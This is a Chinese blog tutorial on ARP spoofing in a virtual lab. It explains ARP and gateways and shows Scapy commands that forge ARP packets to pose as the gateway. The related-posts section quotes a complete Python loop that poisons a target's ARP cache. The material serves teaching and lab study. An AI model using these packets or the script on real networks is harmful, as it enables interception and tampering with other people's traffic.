python构造ARP欺骗数据包

最新推荐文章于 2024-03-11 02:06:25 发布
最新推荐文章于 2024-03-11 02:06:25 发布
阅读量2k 收藏 4
点赞数 2
分类专栏: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43803070/article/details/95594779
版权

在讲ARP欺骗之前先讲讲什么是ARP以及ARP欺骗的原理吧。
一、 什么是ARP?

arp英文全称: address resolution protocol 中文:地址解析协议

它的作用:是根据IP地址获取获取物理地址的一个TCP/IP协议。 主机发送 信息的时候将一个包涵目标主机的IP地址的ARP请求通过广播到网络上所有的主机,并且接受返回信息,以此来确定目标的物理地址。收到返回消息后讲该IP和物理地址存在本机ARP缓存中(这个属于动态ARP)兵保留一定的时间。下次请求时就可以直接查询ARP缓存以节约资源。

二、 ARP欺骗原理

大家通过知道arp的原理之后就应该知道arp的缺陷了。当arp通过广播的形式的时候,虽然主机默认的是:与自己的ip不匹配的就视为丢弃,但是我们可以通过手动的方式来跟靶机讲我就是网关或者其它主机,从而就达到了欺骗目的。

实验环境:

1.虚拟机kali IP:192.168.1.2   MAC:00:0C:29:E4:5C:D2 (攻击机)

2.虚拟机win7 IP:192.168.1.3   MAC:00-0C-29-CA-29-88(靶机:被攻击机)

3.宿主机win7 IP:192.168.1.1   MAC:0A-00-27-00-00-18(服务器DVWA)

例如: 虚拟机win7想访问宿主机的服务器,那么必须知道宿主机的MAC地址,但又因为arp缓存里面没有宿主机的MAC地址,所以就必须以广播的形式来跟宿主机进行连接。 然后它就会讲:请问谁的IP 是192.168.1.1,请把你的MAC给我。宿主机看见广播的地址和自己的地址相同,所以就会回复靶机讲它是,并且把Mac地址发给它,从而就建立了连接。但是 如果kali想攻击它,kali就会在靶机广播的时候也会一直广播发送消息讲它是192.168.1.1,并把MAC发给它,所以靶机就以为它是服务器从而就会上传一些敏感文件给它。从而就达到了欺骗。

**

实验开始:

**
**

一、部署环境

**
实验开始之前要注意,apr欺骗只能在内网中,所以我们虚拟机要改成桥接模式。
1.我们以win03作为靶机,在一开始我们使用arp -a命令查看不到默认网关,然后我把虚拟机模式改成了桥接模式,还是不行,后来我把虚拟机获取IP的方法改成了自动获取,后来可以了,如图:

在这里插入图片描述在这里我把ip获取方式我改成手动设置了,但是手动设置之后发现我们使用arp -a(查看arp缓存表)没有发现缓存的mac地址,这是为啥?我们可以先ping一下随机的主机或者网站,我在们执行arp -a发现查到了mac地址,mac地址就是我们的默认网关,关于网关我们在这这里补充一下:

那么网关到底是什么呢?网关实质上是一个网络通向其他网络的IP地址。比如有网络A和网络B,网络A的IP地址范围为“192.168.1.1~192.
168.1.254”,子网掩码为255.255.255.0;网络B的IP地址范围为“192.168.2.1~192.168.2.254”,子网掩码为255.255.255.0。在没有路由器的情况下,两个网络之间是不能进行TCP/IP通信的,即使是两个网络连接在同一台交换机(或集线器)上,TCP/IP协议也会根据子网掩码(255.255.255.0)判定两个网络中的主机处在不同的网络里。而要实现这两个网络之间的通信,则必须通过网关。如果网络A中的主机发现数据包的目的主机不在本地网络中,就把数据包转发给它自己的网关,再由网关转发给网络B的网关,网络B的网关再转发给网络B的某个主机(如附图所示)。网络B向网络A转发数据包的过程。

在这里插入图片描述

上图说明了我们在访问百度的主机的时候,百度主机与我们的03虚拟机不在同一个网段中,这时候需要我们设定的192.168.1.1网关进行 IP转换。

**

二.构造数据包

**

root@kali:~# scapy
WARNING: No route found for IPv6 destination :: (no default route?)
Welcome to Scapy (2.3.2)
>>> a=ARP()
>>> a.show()
###[ ARP ]###
  hwtype= 0x1
  ptype= 0x800
  hwlen= 6
  plen= 4
  op= who-has
  hwsrc= 00:0c:29:b6:71:0c
  psrc= 192.168.1.110
  hwdst= 00:00:00:00:00:00
  pdst= 0.0.0.0
>>> a.pdst="192.168.1.106"
>>> a.psrc="192.168.1.1"   //我们把我们kali的mac未造成网关的mac。192.168.1.1是网关的ip
>>> send(a)
.
Sent 1 packets.
>>>

我们在03中可以看到,网关的mac对应的ip变成了我们kali的ip:

在这里插入图片描述
我们看到我们kali的主机地址留在了对方的机器上,我们通过wireshark抓包可以发现,我们在第二层的Ether中的源mac地址仍然用的是我们的kali的mac地址。如图:
在我们kali(110)发送给03(106)的数据包中的Ether层的源mac为kali的。
在这里插入图片描述在这里插入图片描述

我们使用以下代码:

>>> sendp(Ether(src="00:0c:29:b6:71:0c",dst="ff:ff:ff:ff:ff:ff")/ARP(pdst="192.168.1.106",psrc="192.168.1.110"))
.
Sent 1 packets.

可以看到我们在靶机上没有获得对应的ip
在这里插入图片描述

在这里插入图片描述

暮秋初九
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Python兴趣编程百例:使用Scapy模块实现一个以太网数据包构造小工具(附完整代码)
复现的博客
04-26 523
接下来我们就利用scapy模块设计开发一个以太网数据构造小工具。 该以太网包构造工具是基于Scapy库实现的,旨在提供一个简单易用的接口,用于创建、发送以太网数据包,并支持捕获网络数据包
网络安全实战(一)ARP欺骗
weixin_42474227的博客
12-30 4204
网络安全实战(一)ARP欺骗
局域网内如何防止ARP欺骗
weixin_33720452的博客
10-22 140
对于ARP欺骗,提出几点加强安全防范的措施。环境是主机或者网关是基于Linux/BSD的。一、理论前提本着“不冤枉好人,不放过一个坏人的原则”,先说说我的一些想法和理论依据。首先,大家肯定发送ARP欺骗包肯定是一个恶毒的程序自动发送的,正常的TCP/IP网络是不会有这样的错误包发送的(板砖扔了过来啊,废话!)。这就假设,如果犯罪嫌疑人没有启动这个破坏程序的时候,网络...
linux系统编程——ARP攻击数据包构造
qq_34276514的博客
10-22 851
一、摘要 最近在学习怎么构造一个arp攻击的数据包,大体上搞定了,来总结一下吧! *本文的主要参考:https://blog.csdn.net/smstong/article/details/7221184,感谢这位老哥提供的代码思路。我与他不同 的地方在于MAC地址的转换(主要老哥写的比较复杂,我懒得看0.0)* 二、概述与前置知识 ARP协议是链路层的协议,链路层的数据单位是帧。链路层...
构造ARP包发包
m0_47968686的博客
01-30 1790
构造ARP包进行arp欺骗 arp分为请求包以及响应包 Opcode中的代码表示请求以及响应 使用wireshark抓包可见,Opcode为1可知这是一个请求包 再来看看响应包,它的Opcode为2 在使用scapy模块构造arp应答包时,我们采用的是第二层发包(就是根据我们第二层中的封装的帧头来发包) ptk2 = Ether()/ARP()#构造数据包 ptk2[ARP].op = 2#设置为应答包 ptk2[ARP].psrc = '192.168.0.1'#我们想要冒充的ip地址 ptk2[
【源码】python网络ARP抓包工具
最新发布
qq_41201689的博客
03-11 466
我们的应用程序采用了模型-视图-控制器(MVC)架构,这是一种用于应用程序开发的常用设计模式,可以将应用程序的输入、处理和输出分离。通过psutil库,我们能够动态获取系统中的网络接口信息,并在GUI中以下拉列表的形式展示给用户。这增加了应用程序的灵活性,允许用户根据实际情况选择合适的网络接口进行嗅探。Scapy是一个强大的交互式数据包处理程序,支持广泛的协议。在我们的应用程序中,Scapy用于捕获和分析ARP数据包数据包嗅探是一个持续的过程,如果在主线程中执行,将阻塞GUI的响应。
研讨三_python_arp欺骗python实现_
10-01
Python ARP欺骗是一种网络攻击技术,它利用了ARP(Address Resolution Protocol)协议的缺陷来篡改网络数据包的流向。ARP是局域网中用于将IP地址映射为MAC地址的协议,而Python的scapy库则提供了实现这种欺骗功能的...
Python程序设计:数据包伪造.pptx
06-13
当你需要伪造MAC地址或执行类似ARP欺骗的操作时,这个函数非常有用。 **伪造数据包示例** 下面是一个简单的伪造IP数据包的例子,这里我们使用`send()`函数向目标主机发送带有假IP的ICMP(Internet Control Message...
ARP欺骗课件
08-31
ARP欺骗就是通过伪造ARP响应,误导网络设备,使得数据包被错误地转发,进而可能导致信息泄露、中间人攻击或其他安全问题。 **ARP欺骗的基本原理** 1. **伪造ARP响应**:攻击者发送虚假的ARP响应,声称自己是网络中...
ARP欺骗的实现
10-23
ARP欺骗,全称为Address Resolution Protocol(地址解析协议)欺骗,是一种网络攻击技术,它通过操纵ARP协议来误导网络中的设备,使得数据包被错误地发送到攻击者而非预期的目标。这种攻击可能导致网络服务中断、...
python毕业设计-IP欺骗,模拟ip
11-07
选择欺骗的主机,实现ARP欺骗,该欺骗主机列表需要先进行主机扫描 arp_cheat 输入攻击主机,进行攻击方式(由于python全局锁的关系,scapy发包速率只有每秒3000个数据包,该功能仅有观看作用) chose_flood 进行...
ARP包的结构以及实现代码
mcupro的专栏
12-03 786
参考文档:ARP报文格式详解 ARP 报文总长度为 28 字节,MAC 地址长度为 6 字节,IP 地址长度为 4 字节。 其中,每个字段的含义如下。 硬件类型:指明了发送方想知道的硬件接口类型,以太网的值为 1。 协议类型:表示要映射的协议地址类型。它的值为 0x0800,表示 IP 地址。 硬件地址长度和协议长度:分别指出硬件地址和协议的长度,以字节为单位。对于以太网上 IP 地址的ARP请求或应答来说,它们的值分别为 6 和 4。 操作类型:用来表示这个报文的类型,ARP 请求为 ...
1-ARP欺骗及攻击
qq_51021850的博客
05-11 873
ARP(Address Resolution Protocol,地址解析协议)是一种用于通过网络层地址(比如IP地址)获取链路层地址(比如MAC地址)的通信协议。它将网络层的IP地址与数据链路层的MAC地址相互映射,使得在计算机进行网络通信时,能够正确地将数据包发送到对应的目标主机。
python scapy arp scan [局域网arp扫描]
热门推荐
正在成为 code ape
03-25 1万+
写个多线程 局域网arp扫描器 看到网上绝大多数的python scapy arp 局域网扫描脚本写的实在是不敢恭维 spended 3mins code this 流程 1.开启数据包捕捉器 2.构造数据包并发送 本python 局域网arp 扫描器是基于多线程进行接收的, ps:这年头谁还用sr或者srp 一个个发送并接收的,效率太低了,还慢。 主要是接收包慢,发包并不消耗太多时间及内存 co...
python 实现扫描器,arp欺骗数据包分析。
haha1314的博客
04-27 695
from scapy.all import * import os import re import time import threading result=os.popen("route print").read() re1=re.findall(r"0\.0\.0\.0\s+0\.0\.0\.0\s+(.+?)\s+(.+?)\s",result) gateway=re1[0][0] ...
APR请求构建
镜湖
10-21 186
ARP请求包构造 1.实验环境 ​ python ​ 物理机(window10) ​ wrieshark 2.实验开始 ​ 2.1 安装Python,之后在Python中安装scapy包 ​ 2.2 了解基本的ARP知识 2.3 构造ARP包 在这里按照这个模板来完成ARP的请求包就好,那个IP地址可以根据自己的环境进行修改。 2.4 用wireshark抓自己构造ARP请求 可以看到,在ARP广播里,有一个是我刚刚构造ARP请求包 我当时抓的是学校的WiFi,包比较杂乱。 建议使用虚拟机去
解析arp数据包 java_构造arp数据包并将其发送到本地linux但没有回复
weixin_29343349的博客
02-19 337
我构建了具有随机ip和MAC地址的ARP数据包(例如,172.29.26.152和0x52,0x54,0x4C,0x00,0x08,0x00) . 在我的电脑上运行该程序 . 因此程序将数据包发送到我自己的NIC(ip:172.29.26.102)eth0以获取其MAC地址 . 但我没有收到eth0的回复 . 我使用 tcpdump -i lo -n -XX 并且没有数据包出现 . 我可以使用 t...
ARP详解及组包案例
weixin_45266788的博客
08-14 710
当一个设备(主机或路由器)需要发送数据包到一个目标设备的IP地址时,它首先会检查本地的ARP缓存表,查看是否已经知道了目标IP对应的MAC地址。当涉及ARP(地址解析协议)时,它是IPv4网络中的关键协议,用于将IP地址映射到物理MAC地址。OP:1(ARP请求),2(ARP应答),3(RARP请求),4(RARP应答)ARP编码案例:组包获取ip对应mac。
arp协议报文格式和arp欺骗 详细分析
08-19 3827
一、ARP协议简介 ARP,全称Address Resolution Protocol,中文名为地址解析协议,它工作在数据链路层,在本层和硬件接口联系,同时对上层提供服务。 IP数据包常通过以太网发送,以太网设备并不识别32位IP地址,它们是以48位以太网地址传输以太网数据包
python实现ARP欺骗攻击
05-31
ARP 欺骗攻击(ARP spoofing)是一种网络攻击方式,攻击者发送伪造的 ARP 响应包,欺骗目标主机将其网关的 MAC 地址修改为攻击者的 MAC 地址,使得攻击者可以拦截、篡改和窃取网络流量。 下面是一个用 Python 实现 ARP 欺骗攻击的示例代码: ```python import sys import time from scapy.all import * # 获取本机 MAC 地址和 IP 地址 mac = get_if_hwaddr('eth0') ip = get_if_addr('eth0') # 定义目标 IP 地址和网关 IP 地址 target_ip = '192.168.0.100' gateway_ip = '192.168.0.1' # 定义伪造的 ARP 响应包 arp_response = Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(psrc=gateway_ip, hwsrc=mac, pdst=target_ip, op='is-at') # 循环发送 ARP 响应包 while True: sendp(arp_response, verbose=0) time.sleep(1) ``` 这段代码使用了 Scapy 库来构造和发送 ARP 响应包。首先,通过 `get_if_hwaddr()` 和 `get_if_addr()` 函数获取本机的 MAC 地址和 IP 地址。然后,定义了目标 IP 地址和网关 IP 地址,并构造了一个伪造的 ARP 响应包,其中 `dst` 字段设置为广播地址,`psrc` 字段设置为网关 IP 地址,`hwsrc` 字段设置为本机的 MAC 地址,`pdst` 字段设置为目标 IP 地址,`op` 字段设置为 `is-at` 表示 ARP 响应。最后,使用 `sendp()` 函数循环发送 ARP 响应包,每隔 1 秒发送一次。 需要注意的是,ARP 欺骗攻击是一种违法行为,仅供学习和研究目的,请勿用于非法用途。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值